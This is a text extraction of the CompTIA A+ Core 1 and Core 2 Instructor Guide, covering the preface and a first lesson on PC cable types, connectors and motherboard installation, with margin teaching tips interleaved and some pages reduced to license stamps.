Downloadable Official CompTIA A+ Core 1 and Core 2 Instructor Guide Copy 3
Downloadable Official CompTIA A+ Core 1 and Core 2 Instructor Guide Copy 3
CompTIA
A+ Core 1 and Core 2
Instructor Guide
(Exams 220-1101 and
220-1102)
Course Edition: 1.0
Acknowledgments
Notices
Disclaimer
While CompTIA, Inc. takes care to ensure the accuracy and quality of these materials, we cannot guarantee their accuracy,
and all materials are provided without any warranty whatsoever, including, but not limited to, the implied warranties of
merchantability or fitness for a particular purpose. The use of screenshots, photographs of another entity's products, or
another entity's product name or service in this book is for editorial purposes only. No such use should be construed to imply
sponsorship or endorsement of the book by nor any affiliation of such entity with CompTIA. This courseware may contain links
to sites on the Internet that are owned and operated by third parties (the "External Sites"). CompTIA is not responsible for
the availability of, or the content located on or through, any External Site. Please contact CompTIA if you have any concerns
regarding such links or External Sites.
Trademark Notice
CompTIA®, A+®, and the CompTIA logo are registered trademarks of CompTIA, Inc. in the United States and other countries.
All other product and service names used may be common law or registered trademarks of their respective proprietors.
Copyright Notice
Copyright © 2022 CompTIA, Inc. All rights reserved. Screenshots used for illustrative purposes are the property of the software
proprietor. Except as permitted under the Copyright Act of 1976, no part of this publication may be reproduced or distributed
in any form or by any means, or stored in a database or retrieval system, without the prior written permission of CompTIA,
3500 Lacey Road, Suite 100, Downers Grove, IL 60515-5439.
This book conveys no rights in the software or other products about which it was written; all use or licensing of such software
or other products is the responsibility of the user according to terms and conditions of the owner. If you believe that this
book, related materials, or any other CompTIA materials are being reproduced or transmitted without permission, please call
1-866-835-8020 or visit https://help.comptia.org.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Table of Contents | iii
Table of Contents
Table of Contents
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
iv | Table of Contents
Table of Contents
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Table of Contents | v
Table of Contents
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
vi | Table of Contents
Glossary...........................................................................................................................G-1
Index................................................................................................................................. I-1
Table of Contents
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Presenting the Official CompTIA A+
Core 1 and Core 2 Instructor Guide
1
(Exams 220-1101 and 220-1102)
The Official CompTIA A+ Core 1 and Core 2 Instructor and Student Guides (Exam
220-1101 and 220-1102) have been developed by CompTIA for the CompTIA
certification candidate. Rigorously evaluated by third-party subject matter experts
to validate adequate coverage of the A+ Core 1 and Core 2 exam objectives, The
Official CompTIA A+ Core 1 and Core 2 Instructor and Student Guides teach students
the knowledge and skills required to install and configure end-user devices and
software, connect devices to networks, perform basic cybersecurity mitigations,
troubleshoot common problems to diagnose and resolve issues, and demonstrate
basic knowledge of scripting, the cloud, and virtualization and prepare candidates
to take the CompTIA A+ Core 1 and Core 2 certification exam.
The Official CompTIA A+ Core 1 and Core 2 Guides are created around several core
principles including:
• Focused on Job Roles and Objectives—The Official CompTIA Guides are
organized into courses, lessons, and topics that align training to work in the
real world. At the course level, the content reflects a real job role, guided by the
objectives and content examples in the CompTIA Exam Objectives document.
Lessons refer to functional areas within that job role. Topics within each lesson
relate to discrete job tasks.
• The course guide, labs, and assessment all work together with a similar
approach and voice to present a cohesive single-sourced solution for a CompTIA
certification course.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
viii | Instructor Preface
Preparing to Teach
Teaching The CompTIA Learning Center is an intuitive online platform that provides access
Tip to the eBook and all accompanying resources to support the Official CompTIA
Your Instructor curriculum. An access key to the CompTIA Learning Center is delivered upon
Guide contains purchase of the print or eBook.
the same content
and pagination as You can use the following resources to prepare to teach this course:
the accompanying • Instructor Tips—Throughout the Instructor Guide, you will see in the margins
Student Guide with
the addition of this
various presentation-focused icons that provide suggestions, answers to
preface and these problems, and supplemental information to help you to teach the course. The
marginal notes to text under these icons is not included in the Student Guide. These notes are
help you present the also included in the notes section of the instructor PowerPoint deck for easy
course. reference while teaching.
Teaching • Resources—Supporting materials for instructors are available for downloading
Tip from the Resources menu in the CompTIA Learning Center. In addition to
A Teaching Tip icon course-specific delivery tips, and solutions to activities and discussion questions,
provides additional you also have access to:
guidance and
background that you • PowerPoint Slides—A complete set of PowerPoint slides is provided to
may want to utilize facilitate the class.
during specific parts of
the course, including • Presentation Planners—Several Presentation Planners are provided in
timings and emphasis.
the Resources menu. The Planners help you to plan the class schedule and
Interaction include examples of schedules for different course lengths, whether courses
Opportunity are continuous or offered separately across a multisession series.
An Interaction • Transition Guide—A detailed guide with information on how the exam
Opportunity provides
objectives and training content have changed from 220-1001 and 220-1002 to
suggestions for
different ways to 220-1101 and 220-1102.
engage with students,
either through • Videos—Videos complement the reading by providing short, engaging
discussions, activities, discussions and demonstrations of key technologies referenced in the course.
or demonstrations.
• Assessments—Practice questions help to verify a student’s understanding of
Show the material for each Lesson. Answers and feedback can be reviewed after each
Slide(s) question, or at the end of the assessment. A timed final assessment provides
The Show Slide icon a practice-test-like experience to help students determine their readiness for
provides a prompt to the CompTIA certification exam. Students can review correct answers and full
display a specific slide feedback after attempting the final assessment.
from the provided
PowerPoint files.
Using CertMaster Labs
CertMaster Labs allow students to learn on virtual machines configured with a
variety of software applications and network topologies via a hosted virtualization
environment. The labs align with The Official CompTIA Instructor and Student
Guides and allow students to practice what they are learning using real, hands-on
experiences. The labs help students gain experience with the practical tasks that will
be expected of them in a job role and on the performance-based items found on
CompTIA certification exams. All lab activities include gradable assessments, offer
feedback and hints, and provide a score based on learner inputs.
There are two types of labs:
• NEW! Virtual Workbench Labs present a series of goal-oriented, immersive labs
in different modes that are performed within a game-like 3D simulation. This
hands-on environment gives students the ability to learn the tangible aspects of
IT and gain real-world experience.
Presenting the Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Instructor Preface | ix
• Virtual Machine Labs utilize virtual machines built to simulate a server network
so a learner can gain real-world, hands-on experience with tools, applications,
and operating systems they would utilize in a job environment Microsoft
Windows, Kali Linux, or Wireshark.
Virtual workbench labs and virtual machine labs are also available in different
modes.
• Assisted Labs provide detailed steps with graded assessment and feedback for
the completion of each task. These labs are shorter, focus on a specific task, and
typically take 10-15 minutes to complete.
The position of assisted and applied labs to support lessons and topics within the
course is included in the presentation planners. Other features of CertMaster Labs
include the following:
• Browser-Based—The labs can be accessed with a browser and Internet
connection, simplifying the setup process and enabling remote students to
perform the activities without having to secure any special equipment or software.
• Modular—The labs within each course are independent of each other and can
be used in any order.
• Ability to Save Work—Students can save their progress in a virtual machine lab
for 48 hours to allow for more flexibility in how you want to use labs during the
course event.
• Find more information about CertMaster Labs and how to purchase them at
store.comptia.org.
Presenting the Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
x | Instructor Preface
Presentation planners are available to download from the CompTIA Learning Center
on the Resources page. Because the content can be presented in a continuous
flow or separately across a multisession series, several sample timetables are
provided. You can use these sample planners to determine how you will conduct
the class to meet the needs of your own situation. A presentation planner helps
you to structure the course by indicating the maximum amount of time you should
spend on any one topic or activity. You will need to adjust these timings to suit your
audience. Your presentation timing and flow may vary based on factors such as the
size of the class, whether students are in specialized job roles, whether you plan
to incorporate videos or other assets from the CompTIA Learning Center into the
course, and so on.
For any given course event, you might need to employ time-saving techniques.
Detailed notes are provided as Teaching Tips at the start of each lesson and topic,
but consider the following general time-saving strategies:
• Some topics will require a more detailed presentation with the use of the slide
deck. Others, such as those that are well-covered by prerequisite certifications,
would suit a less formal style where you use questioning and lead a discussion
to check students‘ existing understanding. Some topics may be suitable for
self-study, but if students have concerns about this, you will have to reduce the
amount of lab activities to compensate.
• Summarize a topic in overview, and then answer questions during a later session
when students have had a chance to study it in more detail.
If students are struggling with lab activities, consider some of the following
approaches:
• Demonstrate a lab as a walkthrough.
• Get students to partner up to complete a lab, with one student completing the
steps and the other student advising and checking.
• Summarize the remaining parts of a lab if students do not have time to finish
in class.
Presenting the Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
1
About This Course
CompTIA is a not-for-profit trade association with the purpose of advancing the Teaching
interests of information technology (IT) professionals and IT channel organizations; Tip
its industry-leading IT certifications are an important part of that mission. Take some time at the
CompTIA’s A+ Core 1 and Core 2 certification is a foundation-level certification start of the course for
designed for professionals with 12 months hands-on experience in a help desk students to introduce
support technician, desk support technician, or field service technician job role. themselves and
identify the outcomes
CompTIA A+ certified professionals are proven problem solvers. They support they hope to achieve
today’s core technologies from security to cloud to data management and more. by studying the
CompTIA A+ is the industry standard for launching IT careers into today’s digital course.
world. It is trusted by employers around the world to identify the go-to person in
end-point management and technical support roles. CompTIA A+ is regularly
re-invented by IT experts to ensure that it validates core skills and abilities
demanded in the workplace.
Course Description
Course Objectives
This course can benefit you in two ways. If you intend to pass the CompTIA A+
Core 1 and Core 2 (Exams 220-1101 and 220-1102) certification examination, this
course can be a significant part of your preparation. But certification is not the only
key to professional success in the field of IT support. Today’s job market demands
individuals with demonstrable skills, and the information and activities in this
course can help you build your skill set so that you can confidently perform your
duties in any entry-level PC support role.
On course completion, you will be able to do the following:
• Install, configure, and troubleshoot PC motherboards, system components, and
peripheral devices.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
xii | Preface
Target Student
The Official CompTIA A+ Core 1 and Core 2 (Exams 220-1101 and 220-1102) is the
primary course you will need to take if your job responsibilities include supporting
the use of PCs, mobile devices, and printers within a corporate or small office home
office (SOHO) network. You can take this course to prepare for the CompTIA A+
Core 1 and Core 2 (Exams 220-1101 and 220-1102) certification examination.
Prerequisites
Teaching To ensure your success in this course, you should have 12 months of hands-on
Tip experience working in a help desk technician, desktop support technician, or field
If students do service technician job role. CompTIA ITF+ certification, or the equivalent knowledge,
not meet the is strongly recommended.
prerequisites, discuss
what help you are The prerequisites for this course might differ significantly from the prerequisites for
able to provide and the CompTIA certification exams. For the most up-to-date information about the exam
what additional steps prerequisites, complete the form on this page: www.comptia.org/training/resources/
they may need to exam-objectives
take to prepare for
each session in terms
of pre-reading or
background study.
How to Use the Study Notes
Teaching The following notes will help you understand how the course structure and
Tip components are designed to support mastery of the competencies and tasks
Set student associated with the target job roles and will help you prepare to take the
expectations for study certification exam.
sessions based on
your delivery format. As You Learn
Discuss how you will
handle questions so At the top level, this course is divided into lessons, each representing an area of
that each student competency within the target job roles. Each lesson is composed of a number of
feels fully supported
topics. A topic contains subjects that are related to a discrete job task, mapped
while the class keeps
moving at the required to objectives and content examples in the CompTIA exam objectives document.
pace to cover all the Rather than follow the exam domains and objectives sequence, lessons and topics
content. are arranged in order of increasing proficiency. Each topic is intended to be studied
within a short period (typically 30 minutes at most). Each topic is concluded by one
or more activities designed to help youapply your understanding of the study notes
to practical scenarios and tasks.
In addition to the study content in the lessons, there is a glossary of the terms and
concepts used throughout the course. There is also an index to assist in locating
particular terminology, concepts, technologies, and tasks within the lesson and
topic content.
In many electronic versions of the book, you can click links on key words in the
topic content to move to the associated glossary definition, and you can click page
references in the index to move to that term in the content. To return to the previous
location in the document after clicking a link, use the appropriate functionality in your
eBook viewing software.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Preface | xiii
As You Review
Any method of instruction is only as effective as the time and effort you, the
student, are willing to invest in it. In addition, some of the information that you
learn in class may not be important to you immediately, but it may become
important later. For this reason, we encourage you to spend some time reviewing
the content of the course after your time in the classroom.
Following the lesson content, you will find a table mapping the lessons and topics
to the exam domains, objectives, and content examples. You can use this as a
checklist as you prepare to take the exam, and review any content that you are
uncertain about.
As a Reference
The organization and layout of this book make it an easy-to-use resource for future
reference. Guidelines can be used during class and as after-class references when
you’re back on the job and need to refresh your understanding. Taking advantage
of the glossary, index, and table of contents, you can use this book as a first source
of definitions, background information, and summaries.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Lesson 1
Installing Motherboards
and Connectors
1
LESSON INTRODUCTION
One of the main roles for a CompTIA A+ technician is to install and configure Show
personal computer (PC) hardware. This hands-on part of the job is what draws Slide(s)
many people to a career in information technology (IT) support. As an IT Objectives
professional, you will set up desktop computers and help end users to select a
system configuration and peripheral devices that are appropriate to their work. Teaching
You will often have to connect peripheral devices using the correct cables and Tip
connectors and install plug-in adapter cards. The course is divided
into three main
To complete these tasks, you must understand how the peripheral devices and sections. The first
internal PC components are connected via the motherboard. As you may encounter section (lessons
many different environments in your work, you must also be able to distinguish and 1–3) focuses on PC
support both modern and legacy connection interfaces. hardware, covering
most of domains 3
(hardware) and 5
Lesson Objectives (troubleshooting).
Lesson 1 focuses
In this lesson, you will: on the system
case, motherboard,
• Explain cable types and connectors. adapters, and
peripheral cable types.
• Install and configure motherboards.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
2 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 1A
Show Explain Cable Types and Connectors
Slide(s) 2
• The front panel provides access to the removable media drives, a power on/off
switch, and light- emitting diodes (LEDs) to indicate drive operation. The front
cover can be removed but may require the side panel to be removed first to
access the screws or clips that secure it.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 3
The rear panel provides access to the power supply unit (PSU) sockets. The PSU has
an integral fan exhaust. Care should be taken that it is not obstructed, as this will
adversely affect cooling. There may be an additional case fan.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
4 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Below the PSU, there is a cutout aligned with the motherboard’s input/output (I/O)
ports. These allow for the connection of peripheral devices.
At the bottom of the rear panel there are cutout slots aligned with the position of
adapter card slots to allow cables to be connected to any I/O ports on the cards.
These slots should either be covered by an adapter card or a metal strip known
as a blanking plate. Uncovered slots can disrupt the proper flow of air around
components in the PC and cause overheating and increase the amount of dust in
the system.
Peripheral Devices
Show An input/output (I/O) port allows a device to be connected to the PC via a
Slide(s) peripheral cable. Some ports are designed for a particular type of device, such as
Peripheral Devices a graphics port to connect a monitor. Other ports support a variety of device types.
External ports are positioned at the rear or front of the PC through cutouts in the
Teaching case. They can be provided on the motherboard or as an expansion card.
Tip
Distinguish between
the bus interface type
and the form factor of
ports and connectors
that each interface
might use. Make sure
students understand
the units used to
describe data storage
and transfer.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 5
A peripheral cable for the Universal Serial Bus (USB) interface with different connector types being
used to connect a portable hard drive and a desktop computer. (Image © 123RF.com)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
6 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
USB port symbol. Variations on this basic icon identify supported features, such as higher transfer
rates and power delivery. Wikimedia Commons (commons.wikimedia.org/wiki/File:USB_icon.png)
USB Standards
There have been several iterations of the USB standard. Each version introduces
better data rates. A version update may also define new connector form factors
and other improvements. The USB 2.0 HighSpeed standard specifies a data rate of
480 Mbps shared between all devices attached to the same host controller. The bus
is half-duplex, meaning that each device can send or receive, but not at the same
time.
Iterations of USB 3.x introduced new connector form factors and upgraded
transfer rates, each of which are full-duplex, so a device can send and receive
simultaneously. USB 3.2 deprecated some of the older terms used to describe the
supported transfer rate:
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 7
• Type B—For connection to large devices such as printers. The connector and
port are square, with a beveled top.
• Type B Mini—A smaller peripheral device connector. This type of connector was
seen on early digital cameras but is no longer widely used.
A USB cable can feature Type A to Type A connectors or can convert from one type
to another (Type A to Type B or Type A to Micro Type B, for instance).
In USB 3, there are new versions of the Type A, Type B, and Type B Micro connectors
with additional signaling pins and wires. USB 3 receptacles and connectors
often have a blue connector tab or housing to distinguish them. USB 3 Type A
connections are physically compatible with USB 1.1 and 2.0 connections, but the
Type B/Type B Micro connections are not. So, for example, you could plug a USB 2
Type A cable into a USB 3 Type A port, but you could not plug a USB 3 Type B cable
into a USB 2 Type B port.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
8 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
USB 3 connectors and ports (from left to right): Type A, Type B, Micro Type B, Type C.
(Image ©123RF.com)
USB 3.1 defines the USB-C connector type. This compact form factor is intended to
provide a single, consistent hardware interface for the standard. The connector is
reversible, meaning it can be inserted either way up. The connector design is also
more robust than the earlier miniB and microB types. USB-C can use the same
type of connector at both ends, or you can obtain USB-C to USB Type A or Type B
converter cables.
Cable Length
The maximum cable length for LowSpeed devices is 3 m, while for FullSpeed and
HighSpeed the limit is 5 m. Vendors may provide longer cables, however. Although
SuperSpeed-capable cables do not have an official maximum length, up to about 3
m is recommended.
Power
As well as a data signal, the bus can supply power to the connected device. Most
USB Type A and Type C ports can be used to charge the battery in a connected
device.
Basic USB ports can supply up to about 4.5 watts, depending on the version. A power
delivery (PD)–capable port can supply up to 100 watts, given suitable connectors and
cabling.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 9
• The resolution of the image, measured in horizontal pixels by vertical pixels. Teaching
For example, 1920x1200 is the typical format of high-definition (HD) video and Tip
3840x2160 is typical of 4K video. Explain that HDMI
is more widespread
• The speed at which the image is redrawn, measured in hertz (Hz) or frames per (all or almost all
second (fps). adapters and displays
will support it)
As examples, uncompressed HD video at 60 fps requires 4.5 Gbps, while 4K at 60 than DisplayPort.
fps requires 8.91 Gbps. DisplayPort’s big
advantage is support
for daisy-chaining
The frame rate in fps is used to describe the video source, while hertz is the refresh rate monitors.
of the display device and video interface. To avoid display artefacts such as ghosting
and tearing, the refresh rate should match the frame rate or be evenly divisible by it. For Explain that there
example, if the frame rate is 60 fps and the refresh rate is 120 Hz, the video should play are older cable types
but that these will be
smoothly.
covered later.
Computer displays are typically of the liquid crystal display (LCD) thin film transistor
(TFT) type. Each pixel in a color LCD comprises cells with filters to generate the three
additive primary colors red, green, and blue (RGB). Each pixel is addressed by a
transistor to vary the intensity of each cell, therefore creating the gamut (range of
colors) that the display can generate. The panel is illuminated by a light-emitting
diode (LED) array or backlight.
An LCD/TFT is often just referred to as a flat-panel display. They are also called
LED displays after the backlight technology (older flat panels use fluorescent tube
backlights). Premium flat-panel monitors are of the organic LED (OLED) type. This means
that each pixel is its own light source. This allows for much better contrast and color
fidelity.
Support for audio is useful because most TVs and monitors have built-in speakers. The
video card must have an audio chipset for this to work, however.
There are full-size (Type A), mini (Type C), and micro (Type D) connectors, all of
which are beveled to ensure correct orientation.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
10 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
HDMI connector and port on the left and mini-HDMI connector and port on the right.
(Image ©123RF.com)
HDMI cable is rated as either Standard (Category 1) or High Speed (Category 2).
High Speed cable supports greater lengths and is required for v1.4 features, such as
4K and refresh rates over 60 Hz. HDMI versions 2.0 and 2.1 specify Premium High
Speed (up to 18 Gbps) and Ultra High Speed (up to 48 Gbps) cable ratings.
DisplayPort Interface
HDMI was developed by consumer electronics companies and requires a royalty to
use. DisplayPort was developed as a royalty-free standard by the Video Electronics
Standards Association (VESA), which is an organization that represents PC graphics
adapter and display technology companies. DisplayPort supports similar features
to HDMI, such as 4K, audio, and content protection. There are full-size DP++
and MiniDP/mDP port and connector types, which are keyed against incorrect
orientation.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 11
Bandwidth can be allocated in bonded lanes (up to four). The bitrate of each lane
was originally 2.7 Gbps but is now (with version 2.0) up to 20 Gbps.
One of the main advantages of DisplayPort over HDMI is support for daisy-chaining
multiple monitors to the same video source. Using multiple monitors with HDMI
requires one video card port for each monitor.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
12 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Thunderbolt version 3 changes the physical interface to use the same port,
connector, and cabling as USB-C. Converter cables are available to connect
Thunderbolt 1 or 2 devices to Thunderbolt 3 ports. A USB device plugged into a
Thunderbolt 3 port will function normally, but Thunderbolt devices will not work if
connected to a USB port that is not Thunderbolt-enabled. Thunderbolt 3 supports
up to 40 Gbps over a short, high-quality cable (up to 0.5 m/1.6 ft.).
Not all USB-C ports support Thunderbolt 3. Look for the flash icon on the port or
confirm using the system documentation. At the time of writing, converged USB 4 and
Thunderbolt 4 standards have been developed, and products are starting to appear on
the market.
Lightning Interface
Apple’s iPhone and iPad mobile devices use a proprietary Lightning port and
connector. The Lightning connector is reversible.
The Lightning port is found only on Apple’s mobile devices. To connect such a
device to a PC, you need a suitable adapter cable, such as Lightning-to-USB A
or Lightning-to-USB C.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 13
The 7-pin data connector does not supply power. A separate 15-pin SATA power
connector is used to connect the device to the PC’s power supply.
The first commercially available SATA standard supported speeds of up to 150
MBps. This standard was quickly augmented by SATA revision 2 (300 MBps) and
then SATA revision 3 (600 MBps).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
14 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Some devices might have both SATA and Molex power connectors.
External SATA
There is also an external SATA (eSATA) standard for the attachment of peripheral
drives, with a 2 m (78 in.) cable. You must use an eSATA cable to connect to
an external eSATA port; you cannot use an internal SATA cable. eSATAp is a
nonstandard powered port used by some vendors that is compatible with both USB
and SATA (with an eSATAp cable). The USB interface dominates the external drive
market, however.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 15
Review Activity:
Cable Types and Connectors
3
1. A technician has removed an adapter card from a PC. Should the Show
technician obtain and install a blanking plate to complete the service Slide(s)
operation? Review
Yes. The fan system is designed to draw cool air across the motherboard and blow Teaching
out warm air. Large holes in the chassis disrupt this air flow. Also, dust will be able Tip
to settle on the system components more easily. A blanking plate covers the empty
Take some time at
slot in the case. the end of each topic
to answer questions.
2. You are labelling spare parts for inventory. What type of USB connector You can use the
is shown in the exhibit? review questions
for discussion in
class or set them for
students to complete
individually during or
after class.
(Image ©123RF.com)
3. What is the nominal data rate of a USB port supporting Gen 3.2 2x1?
10 Gbps.
4. True or false? USB-C ports and connectors are compatible with Apple
Lightning connectors and ports.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
16 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
(Image ©123RF.com)
A Molex cable is a power cable used for storage devices that require more power
than can be supplied over most internal bus types. Unused connectors do not pose
any problem (though they should be secured with cable ties to minimize disruption
to air flow). Note that Molex is a legacy connector format. Most drives use SATA
power connectors these days.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 17
Topic 1B
Install and Configure Motherboards
7
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
18 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
CPU, cache, and RAM are fast but volatile. Mass storage and removable storage devices provide
slower but permanent data retrieval. (Image ©123RF.com)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 19
Operational procedures covering personal safety and the use of anti-ESD equipment are
covered in more detail in the Core 2 course.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
20 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Teaching
Tip
Focus on identifying
the sockets and slots.
Note that features
and types of power
supplies, system
memory, and CPUs
are covered in more
detail in lesson 2.
CPU Sockets
New motherboards are generally released to support the latest CPU models. Most
PC CPUs are manufactured by Intel and AMD, and these vendors use different
socket designs. Because CPU technology changes rapidly, a given motherboard will
only support a limited number of processor models.
The CPU socket has a distinctive square shape. When the CPU has been installed, it
is covered by a heat sink and fan.
The function of the CPU is supported by the motherboard’s chipset. This consists of
controllers that handle the transfer of data between the CPU and various devices.
The chipset is soldered onto the motherboard and cannot be upgraded. The type
of chipset on the motherboard determines the choice of processor; the type and
maximum amount of RAM; and support for integrated interfaces/ports, such as
video, sound, and networking. Interfaces that are not supported by the chipset can
be installed or upgraded as an adapter card.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 21
System RAM is normally packaged as a dual inline memory module (DIMM) fitted
to a motherboard slot. A DIMM slot has catches at either end, is located close to
the CPU socket, and is numbered and often color-coded. There are successive
generations of RAM technologies, such as DDR3, DDR4, and DDR5. A DIMM form
factor is specific to a particular DDR version. A label next to the slots should identify
the type of DIMMs supported.
The capabilities of the memory controller and number of physical slots determine
how much memory can be fitted.
M.2 form factor SSD being inserted into a motherboard connector. (Image ©123RF.com)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
22 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 23
Each point-to-point connection is referred to as a link. Each link can make use
of one or more lanes. The raw transfer rate of each lane depends on the PCIe
version supported. Transfer rates are measured in gigatransfers per second (GT/s).
Throughput in GB/s is the rate achieved after loss through encoding is accounted for.
A slot may support a lower number of lanes than its physical size suggests. The number
of lanes supported by each slot is indicated by a label on the motherboard. For
example, a slot that is physically x16 but supports only x8 operation will be labelled
x16/x8 or x16 @ x8.
All PCIe versions are backwards-compatible. For example, you can connect a
PCIe version 2 adapter to a version 4 motherboard or install a version 3 adapter
into a version 2 motherboard. The bus works at the speed of the lowest version
component.
PCIe can supply up to 75W to a graphics card via a dedicated graphics adapter slot
and up to 25W over other slots. An extra 75W power can be supplied via a PCIe
power connector.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
24 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 25
No commercial motherboards were ever produced from the original plain ITX specification.
Motherboard Installation
The motherboard is attached to the case by using standoffs. These hold the
motherboard firmly and ensure no other part of it touches the case. The standoffs
are positioned in holes that line up in the same position in the case and the
motherboard if they use compatible form factors
The general procedure for installing a motherboard is as follows:
1. Use the motherboard documentation to familiarize yourself with the specific
installation procedure. Check whether any jumper clips need to be adjusted.
A jumper is placed over header pins in a particular orientation. For example,
there might be a jumper that enables recovery mode.
2. Orient the board to the oblong I/O cutout at the rear of the case. Prepare the
motherboard I/O blanking plate in the correct orientation by removing caps so
that USB, audio, and video ports will be uncovered when the board is fitted. Fit
the blanking plate to the case by snapping it into the cutout.
3. Insert standoffs into the case to match the hole locations on the motherboard.
Standoffs are usually threaded, though older cases might use push-down
pegs. There might be a guide standoff attached to the case or all standoffs
might come preinstalled. Make sure that corners, long edges, and the center
of the board will be supported. Do not add standoffs where there is no
corresponding hole in the motherboard.
4. Optionally, add the CPU and memory modules to the motherboard before
installing the board in the case.
5. Check the alignment and standoff location again and verify that each standoff
is secure. If everything is correct, place the motherboard on the standoffs.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
26 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Align the board with the I/O cutout (top left) and ensure that it is supported by standoffs at the
edges and in the center. (Image courtesy of CompTIA.)
6. Secure each standoff using the appropriate screw type. Make sure that
the board is firm and stable, but do not overtighten the screws or you risk
cracking the board.
7. To complete PC installation, add the power and disk devices to the case, install
any addon adapter cards to the motherboard, and install the data and power
connectors.
Selection and installation of power, disk, system memory, and CPU devices are covered
in detail in the next lesson.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 27
Interaction
Opportunity
If you have examples
to show or pass
around, point out
these features or get
students to locate
them.
Headers
Components on the front and rear panels of the case connect to headers on the
motherboard:
• Power button (soft power)—Sends a signal that can be interpreted by the OS
